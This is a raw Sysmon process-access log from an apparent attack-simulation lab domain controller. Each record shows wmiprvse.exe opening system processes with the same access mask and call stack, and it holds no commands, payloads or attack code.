16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246464Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246463Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246462Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246461Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246460Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246459Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246458Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246457Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246456Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246455Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246454Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246453Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246452Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246451Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246450Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246449Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246448Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246447Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246446Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.088{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246445Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 